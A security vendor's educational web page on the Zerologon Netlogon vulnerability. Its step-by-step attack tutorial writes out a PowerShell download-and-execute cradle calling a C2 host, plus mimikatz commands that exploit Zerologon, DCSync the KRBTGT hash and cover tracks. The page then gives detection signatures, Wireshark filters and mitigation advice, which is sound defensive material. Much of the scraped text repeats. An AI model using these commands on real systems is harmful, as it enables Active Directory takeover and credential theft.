.svg){kind=icon}
Netwrix Auditor 
Netwrix Change Tracker 
Netwrix Data Classification 
Netwrix Enterprise Auditor 
Netwrix GroupID 
Netwrix Password Policy Enforcer 
Netwrix Password Secure 
Netwrix Password Reset 
Netwrix PolicyPak 
Netwrix Privilege Secure 
Netwrix Recovery for Active Directory 
Netwrix StealthINTERCEPT 
Netwrix Strongpoint 
Netwrix Threat Manager 
Netwrix Usercube 
Netwrix 1Secure 
Netwrix Endpoint Protector 
Zerologon Exploit Attack
On September 11, 2020, researchers at Secura announced a new vulnerability they named Zerologon. Zerologon enables an unauthenticated attacker to remotely escalate their privileges to Domain Admin, with network access to a domain controller as the only requirement. Every organization running Active Directory was vulnerable to this exploit.
Zerologon exploits an insecure implementation of encryption in the Netlogon Remote Protocol. The researchers discovered that the ComputeNetLogonCredential function utilized a null (all zeros) initialization vector (IV) for the AES algorithm operating in 8-bit cipher feedback mode. When operating in this mode, reusing the same IV leaks information about the plaintext password and is considered insecure.
In normal operation, the weak IV implementation isn't noticeable, but the researchers found that about 1 in 256 authentications with an all-zero plaintext password and an all-zero IV produced an all-zero ciphertext. This means that once an attacker has network access to a domain controller, they can brute-force their way onto the domain controller in about 256 attempts — which takes only 2–3 seconds. Any account lockout policy that might be in place is irrelevant because it applies only to user accounts.
Threat Summary
Target:
Active Directory
Tools:
ATT&CK® Tactic:
ATT&CK Technique:
Difficulty
Detection:
Medium
Mitigation:
Low
Response:
Hard
Attack Tutorial: How the Zerologon Attack Works
STEP 1
Gain a foothold in the network
To exploit the Zerologon vulnerability, an adversary must first gain a foothold in the victim's network so they can communicate directly with a vulnerable domain controller. There are many ways to gain a foothold; in the example below, we assume the adversary has tricked an unsuspecting user into opening a malicious document that deploys a backdoor and connects to the adversary's Covenant command-and-control infrastructure.
Code:
# Non-Encoded Command
powershell -Sta -Nop -Window Hidden -Command "iex (New-Object Net.WebClient).DownloadString('http://sbl-kali2/ps-listener')"
# Encoded Command
powershell -Sta -Nop -Window Hidden -EncodedCommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBiAGwALQBrAGEAbABpADIALwBwAHMALQBsAGkAcwB0AGUAbgBlAHIAJwApAA
STEP 2
Locate a vulnerable domain controller
Once the adversary has obtained a foothold on the network, they need to conduct reconnaissance to determine whether any domain controllers are present and vulnerable to the exploit. Because they now possess code execution rights on a user's computer, they are able to use PowerShell to enumerate domain controllers and versions in the current domain.
Code:
PowerShell /powershellcommand:"[DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers | Select Name, OSVersion"
STEP 3
Authenticate to a vulnerable DC
Once the adversary determines which vulnerable domain controllers they can communicate with, they can easily exploit the Zerologon vulnerability, as all it requires is the ability to communicate with a domain controller over Netlogon RPC. It's important to note that this attack doesn't require authentication and can be executed from a non-Windows system.
Code:
Mimikatz.exe "Lsadump::zerologon /target:sbl-basalt2 /account:sbl-basalt2$ /exploit"Output:
mimikatz # lsadump::zerologon /target:sbl-basalt2 /account:sbl-basalt2$ /exploit /null
Remote : sbl-basalt2
ProtSeq : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: yes
Target : sbl-basalt2
Account: sbl-basalt2$
Type : 6 (Server)
Mode : exploit
Trying to 'authenticate'...
======================================================================================================================================================================
NetrServerAuthenticate2: 0x00000000
NetrServerPasswordSet2 : 0x00000000
* Authentication: OK -- vulnerable
* Set password : OK -- may be unstable
STEP 4
Complete the attack
Running the command above will have reset the password for the domain controller's computer account to a null value. It is important to note that only the computer account's password in Active Directory has been reset; the domain controller will still be attempting to use its old password to replicate changes, which will fail.
The adversary can now use this computer account (and the privileges assigned to it) to further compromise Active Directory. For example, they can use these credentials to conduct a DCSync attack to replicate the KRBTGT password hash and mint Golden Tickets. Afterward, the adversary can cover their tracks by running the lsadump::postzerologon command to restore the domain controller to operational status.
The adversary can now use this computer account (and the privileges assigned to it) to further compromise Active Directory. For example, they can use these credentials to conduct a DCSync attack to replicate the KRBTGT password hash and mint Golden Tickets. Afterward, the adversary can cover their tracks by running the lsadump::postzerologon command to restore the domain controller to operational status.
Code:
lsadump::dcsync /domain:basalt.igneous.stealthbitslab.com /dc:sbl-basalt2 /user:ba\krbtgt /authuser:sbl-basalt2$ /authdomain:ba /authpassword:"" /authntlm
lsadump::postzerologon /target:10.154.202.2 /account:sbl-basalt2$ /nullOutput:
mimikatz # lsadump::dcsync /domain:basalt.igneous.stealthbitslab.com /dc:sbl-basalt2 /user:ba\krbtgt /authuser:sbl-basalt2$ /authdomain:ba /authpassword:"" /authntlm
[DC] 'basalt.igneous.stealthbitslab.com' will be the domain
[DC] 'sbl-basalt2' will be the DC server
[DC] 'ba\krbtgt' will be the user account
[AUTH] Username: sbl-basalt2$
[AUTH] Domain : ba
[AUTH] Password:
[AUTH] Explicit NTLM Mode
--- Output Truncated ---
Credentials:
Hash NTLM: 75557a32b7c51e11361ab752eb9720da
ntlm- 0: 75557a32b7c51e11361ab752eb9720da
lm - 0: cf591b998a49fa934e3fb0dde45c75ff
--- Output Truncated ---
Credentials
aes256_hmac (4096) : 13d99f13f9f984b8af7779f97e9b096897b7d79653369c46dddc9fb6b17c806b
aes128_hmac (4096) : 97605fe38f43efdf348dc16a75acb265
des_cbc_md5 (4096) : c1f7e989dfbcf4fb
--- Output Truncated ---
mimikatz # lsadump::postzerologon /target:10.154.202.2 /account:sbl-basalt2$ /null
Procedure to update AD domain password and its local stored password remotely
mimic `netdom resetpwd`, experimental & best situation after reboot
Target : 10.154.202.2
Account: sbl-basalt2$
* SAM information
Domain name : BA
Domain SID : S-1-5-21-792045605-1560570832-3988794325
User RID : 1122
> Password updated (to FlipFl0p2020)
* Computer stored password
> Password updated (to FlipFl0p2020)Detect, Mitigate and Respond
Detect
Mitigate
Respond
Difficulty:
Medium
It's possible to detect the exploitation of the Zerologon vulnerability using:
Attempts to exploit the Zerologon vulnerability are evidenced by multiple NetrServerAuthenticate messages from the same host in the same second which result in Bad password. This activity can also be used to detect attempts to exploit the vulnerability against domain controllers that have been patched.
If exploitation is successful, then a packet will exist where the client credential is all zeros but the authentication return code is Status_Success (0x00000000). The Wireshark display filter to find this traffic is
- Netlogon service debug logs
- Packet capturing
- Offensive tooling to check for current or past empty passwords
Detection using Netlogon Debug Logs
Netlogon debug logging is very useful for troubleshooting many types of issues in an Active Directory environment — including finding signs of attempted or successful Zerologon exploitation. However, Netlogon debug logs are not enabled by default. Running the commandnltest /DBFlag:20000300 will enable logging of critical error and session setup events.Attempts to exploit the Zerologon vulnerability are evidenced by multiple NetrServerAuthenticate messages from the same host in the same second which result in Bad password. This activity can also be used to detect attempts to exploit the vulnerability against domain controllers that have been patched.
11/10 11:26:48 [CRITICAL] [6784] BA: NetrServerAuthenticate: Bad password 0 for mimikatz on account sbl-basalt2$If the target domain controller is vulnerable, an eventual success message will also be found:
11/10 11:26:48 [SESSION] [6784] BA: NetrServerAuthenticate returns Success: mimikatz on account sbl-basalt2$ (Negot: 212fffff)Executing mimikatz (Step 3 above) resets the domain controller's computer account password to a null value. This is evidenced by a NetpServerPasswordSet call to reset the password to a null value. This null value can be readily detected by searching for the string
d98c1dd4 04b2008f 980980e9 7e42f8ec, which is the MD5 hash of the null password.
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ Entered
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ Changing password locally
11/10 11:43:49 [SESSION] [2272] Setting Password of 'sbl-basalt2$' to: d98c1dd4 04b2008f 980980e9 7e42f8ec ..............B~
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ returns 0x0
Detection using Network Packet Captures
Network monitoring can also be used to detect attempts to exploit the Zerologon vulnerability. Monitor Netlogon traffic for the NetrServerAuthenticate2 operation where the client credential is all zeros. For example, in Wireshark, the display filternetlogon.opnum == 15 && netlogon.clientcred == 00:00:00:00:00:00:00:00) will show this traffic.If exploitation is successful, then a packet will exist where the client credential is all zeros but the authentication return code is Status_Success (0x00000000). The Wireshark display filter to find this traffic is
netlogon.opnum == 15 && (netlogon.rc == 0x00000000 || netlogon.clientcred == 00:00:00:00:00:00:00:00).Detection using Offensive Tooling
This strategy is particularly useful if you suspect that domain controllers may have been compromised in the recent past and an adversary has covered their tracks. Because this approach uses offensive tooling, it's important to get the right approvals before attempting it. You can use tools likemimikatz and the DCSync technique to replicate domain controller computer account password hashes from Active Directory. This will show all the stored hashes for the computer account up to the maximum specified by the Enforce Password History setting in the password policy; check for a current or previous hash of 31d6cfe0d16ae931b73c59d7e0c089c0, which is the NTLM hash for an empty password.
Difficulty:
Low
It is essential to apply the patches released by Microsoft in August of 2020 that resolve the vulnerability by denying authentication if the first 5 bytes of the clientStoredCredential are not unique.
If any domain controllers still operate on an unsupported (and therefore unpatched) version of Windows (2008R2 and below), isolate them and make plans to upgrade or replace them. If technical requirements prevent upgrading to supported versions, separate domains should be used for these legacy systems.
If any domain controllers still operate on an unsupported (and therefore unpatched) version of Windows (2008R2 and below), isolate them and make plans to upgrade or replace them. If technical requirements prevent upgrading to supported versions, separate domains should be used for these legacy systems.
Difficulty:
Hard
If an adversary has successfully exploited Zerologon, then a full compromise of Active Directory should be presumed. Additional evidence of attempts to compromise the NTDS.dit file or use of the DCSync technique should be expected. You should activate the incident response process and alert the response team.
Detect
Difficulty:
Medium
It's possible to detect the exploitation of the Zerologon vulnerability using:
Attempts to exploit the Zerologon vulnerability are evidenced by multiple NetrServerAuthenticate messages from the same host in the same second which result in Bad password. This activity can also be used to detect attempts to exploit the vulnerability against domain controllers that have been patched.
If exploitation is successful, then a packet will exist where the client credential is all zeros but the authentication return code is Status_Success (0x00000000). The Wireshark display filter to find this traffic is
- Netlogon service debug logs
- Packet capturing
- Offensive tooling to check for current or past empty passwords
Detection using Netlogon Debug Logs
Netlogon debug logging is very useful for troubleshooting many types of issues in an Active Directory environment — including finding signs of attempted or successful Zerologon exploitation. However, Netlogon debug logs are not enabled by default. Running the commandnltest /DBFlag:20000300 will enable logging of critical error and session setup events.Attempts to exploit the Zerologon vulnerability are evidenced by multiple NetrServerAuthenticate messages from the same host in the same second which result in Bad password. This activity can also be used to detect attempts to exploit the vulnerability against domain controllers that have been patched.
11/10 11:26:48 [CRITICAL] [6784] BA: NetrServerAuthenticate: Bad password 0 for mimikatz on account sbl-basalt2$If the target domain controller is vulnerable, an eventual success message will also be found:
11/10 11:26:48 [SESSION] [6784] BA: NetrServerAuthenticate returns Success: mimikatz on account sbl-basalt2$ (Negot: 212fffff)Executing mimikatz (Step 3 above) resets the domain controller's computer account password to a null value. This is evidenced by a NetpServerPasswordSet call to reset the password to a null value. This null value can be readily detected by searching for the string
d98c1dd4 04b2008f 980980e9 7e42f8ec, which is the MD5 hash of the null password.
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ Entered
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ Changing password locally
11/10 11:43:49 [SESSION] [2272] Setting Password of 'sbl-basalt2$' to: d98c1dd4 04b2008f 980980e9 7e42f8ec ..............B~
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ returns 0x0
Detection using Network Packet Captures
Network monitoring can also be used to detect attempts to exploit the Zerologon vulnerability. Monitor Netlogon traffic for the NetrServerAuthenticate2 operation where the client credential is all zeros. For example, in Wireshark, the display filternetlogon.opnum == 15 && netlogon.clientcred == 00:00:00:00:00:00:00:00) will show this traffic.If exploitation is successful, then a packet will exist where the client credential is all zeros but the authentication return code is Status_Success (0x00000000). The Wireshark display filter to find this traffic is
netlogon.opnum == 15 && (netlogon.rc == 0x00000000 || netlogon.clientcred == 00:00:00:00:00:00:00:00).Detection using Offensive Tooling
This strategy is particularly useful if you suspect that domain controllers may have been compromised in the recent past and an adversary has covered their tracks. Because this approach uses offensive tooling, it's important to get the right approvals before attempting it. You can use tools likemimikatz and the DCSync technique to replicate domain controller computer account password hashes from Active Directory. This will show all the stored hashes for the computer account up to the maximum specified by the Enforce Password History setting in the password policy; check for a current or previous hash of 31d6cfe0d16ae931b73c59d7e0c089c0, which is the NTLM hash for an empty password.
Mitigate
Difficulty:
Low
It is essential to apply the patches released by Microsoft in August of 2020 that resolve the vulnerability by denying authentication if the first 5 bytes of the clientStoredCredential are not unique.
If any domain controllers still operate on an unsupported (and therefore unpatched) version of Windows (2008R2 and below), isolate them and make plans to upgrade or replace them. If technical requirements prevent upgrading to supported versions, separate domains should be used for these legacy systems.
If any domain controllers still operate on an unsupported (and therefore unpatched) version of Windows (2008R2 and below), isolate them and make plans to upgrade or replace them. If technical requirements prevent upgrading to supported versions, separate domains should be used for these legacy systems.
Respond
Difficulty:
Hard
If an adversary has successfully exploited Zerologon, then a full compromise of Active Directory should be presumed. Additional evidence of attempts to compromise the NTDS.dit file or use of the DCSync technique should be expected. You should activate the incident response process and alert the response team.
Featured Solutions
OTHER ATTACKS
MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.